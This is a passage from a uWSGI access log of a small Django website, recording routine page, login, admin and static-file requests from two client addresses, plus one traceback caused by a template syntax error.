bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2436/3308] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:18:57 2021] GET /single/4/ => generated 12521 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3309] 219.228.146.135 () {40 vars in 965 bytes} [Thu Jan 14 13:18:58 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3310] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 13:18:58 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2437/3311] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:19:08 2021] GET /single/4/ => generated 12521 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3312] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 13:19:08 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2438/3313] 219.228.146.135 () {48 vars in 1103 bytes} [Thu Jan 14 13:19:14 2021] POST /single/4/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2439/3314] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:19:14 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2440/3315] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:19:14 2021] GET /single/4/ => generated 13032 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2441/3316] 219.228.146.135 () {48 vars in 1016 bytes} [Thu Jan 14 13:19:17 2021] POST /single/4/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2442/3317] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 13:19:17 2021] GET /single/4/ => generated 12523 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2443/3318] 219.228.146.135 () {48 vars in 1016 bytes} [Thu Jan 14 13:19:20 2021] POST /single/4/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2444/3319] 219.228.146.135 () {40 vars in 923 bytes} [Thu Jan 14 13:19:20 2021] GET /single/4/ => generated 12012 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2445/3320] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 13:20:01 2021] GET /single/4/ => generated 12007 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3321] 219.228.146.135 () {40 vars in 964 bytes} [Thu Jan 14 13:20:01 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3322] 219.228.146.135 () {40 vars in 900 bytes} [Thu Jan 14 13:20:01 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3323] 219.228.146.135 () {42 vars in 882 bytes} [Thu Jan 14 13:20:01 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2446/3324] 219.228.146.135 () {48 vars in 1102 bytes} [Thu Jan 14 13:20:07 2021] POST /single/4/ => generated 0 bytes in 21 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2447/3325] 219.228.146.135 () {42 vars in 952 bytes} [Thu Jan 14 13:20:07 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2448/3326] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 13:20:08 2021] GET /single/4/ => generated 12513 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Internal Server Error: /single/4/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 470, in parse + compile_func = self.tags[command] +KeyError: 'endfor' + +During handling of the above exception, another exception occurred: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 365, in single + return render(request, 'single.html', response) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/shortcuts.py", line 19, in render + content = loader.render_to_string(template_name, context, request, using=using) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/loader.py", line 61, in render_to_string + template = get_template(template_name, using=using) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/loader.py", line 15, in get_template + return engine.get_template(template_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/backends/django.py", line 34, in get_template + return Template(self.engine.get_template(template_name), self) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/engine.py", line 143, in get_template + template, origin = self.find_template(template_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/engine.py", line 125, in find_template + template = loader.get_template(name, skip=skip) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/loaders/base.py", line 30, in get_template + contents, origin, origin.template_name, self.engine, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 155, in __init__ + self.nodelist = self.compile_nodelist() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 193, in compile_nodelist + return parser.parse() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 478, in parse + raise self.error(token, e) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 476, in parse + compiled_result = compile_func(self, token) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/defaulttags.py", line 814, in do_for + nodelist_loop = parser.parse(('empty', 'endfor',)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 478, in parse + raise self.error(token, e) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 476, in parse + compiled_result = compile_func(self, token) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/defaulttags.py", line 965, in do_if + nodelist = parser.parse(('elif', 'else', 'endif')) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 472, in parse + self.invalid_block_tag(token, command, parse_until) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 528, in invalid_block_tag + get_text_list(["'%s'" % p for p in parse_until], 'or'), +django.template.exceptions.TemplateSyntaxError: Invalid block tag on line 174: 'endfor', expected 'elif', 'else' or 'endif'. Did you forget to register or load this tag? +[pid: 15176|app: 0|req: 2449/3327] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:21:35 2021] GET /single/4/ => generated 177257 bytes in 101 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2450/3328] 219.228.146.135 () {40 vars in 902 bytes} [Thu Jan 14 13:22:59 2021] GET /single/4/ => generated 12519 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3329] 219.228.146.135 () {40 vars in 851 bytes} [Thu Jan 14 13:23:00 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3330] 219.228.146.135 () {40 vars in 849 bytes} [Thu Jan 14 13:23:00 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3331] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 13:23:00 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3332] 219.228.146.135 () {40 vars in 857 bytes} [Thu Jan 14 13:23:00 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3333] 219.228.146.135 () {40 vars in 965 bytes} [Thu Jan 14 13:23:00 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3334] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 13:23:00 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3335] 219.228.146.135 () {40 vars in 914 bytes} [Thu Jan 14 13:23:00 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3336] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 13:23:00 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2451/3337] 219.228.146.135 () {48 vars in 1103 bytes} [Thu Jan 14 13:23:07 2021] POST /single/4/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2452/3338] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:23:07 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2453/3339] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:23:07 2021] GET /single/4/ => generated 13028 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2454/3340] 180.160.48.43 () {40 vars in 849 bytes} [Thu Jan 14 13:23:39 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2455/3341] 180.160.48.43 () {48 vars in 958 bytes} [Thu Jan 14 13:23:57 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2456/3342] 180.160.48.43 () {48 vars in 958 bytes} [Thu Jan 14 13:24:01 2021] POST /login/ => generated 27 bytes in 31 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2457/3343] 180.160.48.43 () {40 vars in 873 bytes} [Thu Jan 14 13:24:01 2021] GET /home/ => generated 10468 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3344] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 13:24:01 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3345] 180.160.48.43 () {40 vars in 855 bytes} [Thu Jan 14 13:24:01 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2458/3346] 180.160.48.43 () {40 vars in 880 bytes} [Thu Jan 14 13:24:03 2021] GET /single/4/ => generated 13033 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3347] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:24:03 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3348] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 13:24:03 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2459/3349] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:24:09 2021] POST /single/4/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2460/3350] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:24:09 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2461/3351] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:24:09 2021] GET /single/4/ => generated 13556 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2462/3352] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:24:20 2021] POST /single/4/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2463/3353] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:24:20 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2464/3354] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:24:20 2021] GET /single/4/ => generated 14072 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2465/3355] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 13:24:59 2021] POST /single/4/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2466/3356] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:24:59 2021] GET /single/4/ => generated 13558 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3357] 219.228.146.135 () {40 vars in 965 bytes} [Thu Jan 14 13:24:59 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3358] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 13:24:59 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2467/3359] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 13:25:07 2021] POST /single/4/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2468/3360] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:25:07 2021] GET /single/4/ => generated 13035 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2469/3361] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 13:26:17 2021] POST /single/4/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2470/3362] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:26:17 2021] GET /single/4/ => generated 12528 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3363] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 13:26:17 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2471/3364] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 13:27:06 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2472/3365] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 13:27:09 2021] GET /ownpublish-0-0-0 => generated 10334 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3366] 219.228.146.135 () {40 vars in 906 bytes} [Thu Jan 14 13:27:09 2021] GET /static/img/t_photo/16_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2473/3367] 219.228.146.135 () {40 vars in 923 bytes} [Thu Jan 14 13:27:15 2021] GET /home/ => generated 10463 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3368] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 13:27:15 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3369] 219.228.146.135 () {40 vars in 895 bytes} [Thu Jan 14 13:27:15 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2474/3370] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 13:27:49 2021] GET /all-0-0-0 => generated 14048 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3371] 219.228.146.135 () {40 vars in 897 bytes} [Thu Jan 14 13:27:49 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3372] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 13:27:49 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3373] 219.228.146.135 () {40 vars in 975 bytes} [Thu Jan 14 13:27:49 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3374] 219.228.146.135 () {40 vars in 929 bytes} [Thu Jan 14 13:27:49 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2475/3375] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:27:51 2021] GET /all-0-0-0 => generated 14048 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2476/3376] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:27:53 2021] GET /all-3-0-0 => generated 9986 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2477/3377] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:27:55 2021] GET /all-4-0-0 => generated 9983 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2478/3378] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:27:57 2021] GET /all-5-0-0 => generated 10419 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2479/3379] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:28:00 2021] GET /all-6-0-0 => generated 9983 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2480/3380] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:28:05 2021] GET /all-8-0-0 => generated 10422 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2481/3381] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:28:11 2021] GET /all-9-0-0 => generated 10394 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2482/3382] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:30:47 2021] POST /single/4/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2483/3383] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:30:47 2021] GET /single/4/ => generated 11995 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3384] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:30:47 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3385] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 13:30:47 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2484/3386] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:30:49 2021] POST /single/4/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2485/3387] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:30:49 2021] GET /single/4/ => generated 11475 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2486/3388] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:30:51 2021] POST /single/4/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2487/3389] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:30:51 2021] GET /single/4/ => generated 10964 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2488/3390] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:30:53 2021] POST /single/4/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2489/3391] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:30:53 2021] GET /single/4/ => generated 10452 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2490/3392] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:30:56 2021] POST /single/4/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2491/3393] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:30:56 2021] GET /single/4/ => generated 9936 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2492/3394] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:31:30 2021] GET /all-0-0-0 => generated 14053 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3395] 180.160.48.43 () {40 vars in 857 bytes} [Thu Jan 14 13:31:30 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3396] 180.160.48.43 () {38 vars in 834 bytes} [Thu Jan 14 13:31:31 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 215061 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3397] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 13:31:31 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3398] 180.160.48.43 () {38 vars in 880 bytes} [Thu Jan 14 13:31:31 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 168198 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3399] 180.160.48.43 () {38 vars in 804 bytes} [Thu Jan 14 13:31:31 2021] GET /static/img/t_photo/16_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2493/3400] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:31:45 2021] GET /all-6-0-0 => generated 9988 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2494/3401] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:33:07 2021] GET /all-0-0-0 => generated 14053 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2495/3402] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:33:10 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2496/3403] 180.160.48.43 () {40 vars in 886 bytes} [Thu Jan 14 13:33:10 2021] GET /single/12/ => generated 9860 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2497/3404] 180.160.48.43 () {40 vars in 849 bytes} [Thu Jan 14 13:33:35 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2498/3405] 180.160.48.43 () {40 vars in 881 bytes} [Thu Jan 14 13:33:41 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2499/3406] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:33:44 2021] POST /my-admin/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2500/3407] 180.160.48.43 () {40 vars in 888 bytes} [Thu Jan 14 13:33:44 2021] GET /admin-home/ => generated 23929 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3408] 180.160.48.43 () {40 vars in 877 bytes} [Thu Jan 14 13:33:44 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3409] 180.160.48.43 () {40 vars in 811 bytes} [Thu Jan 14 13:33:44 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3410] 180.160.48.43 () {40 vars in 823 bytes} [Thu Jan 14 13:33:44 2021] GET /static/css/colors/blue.css => generated 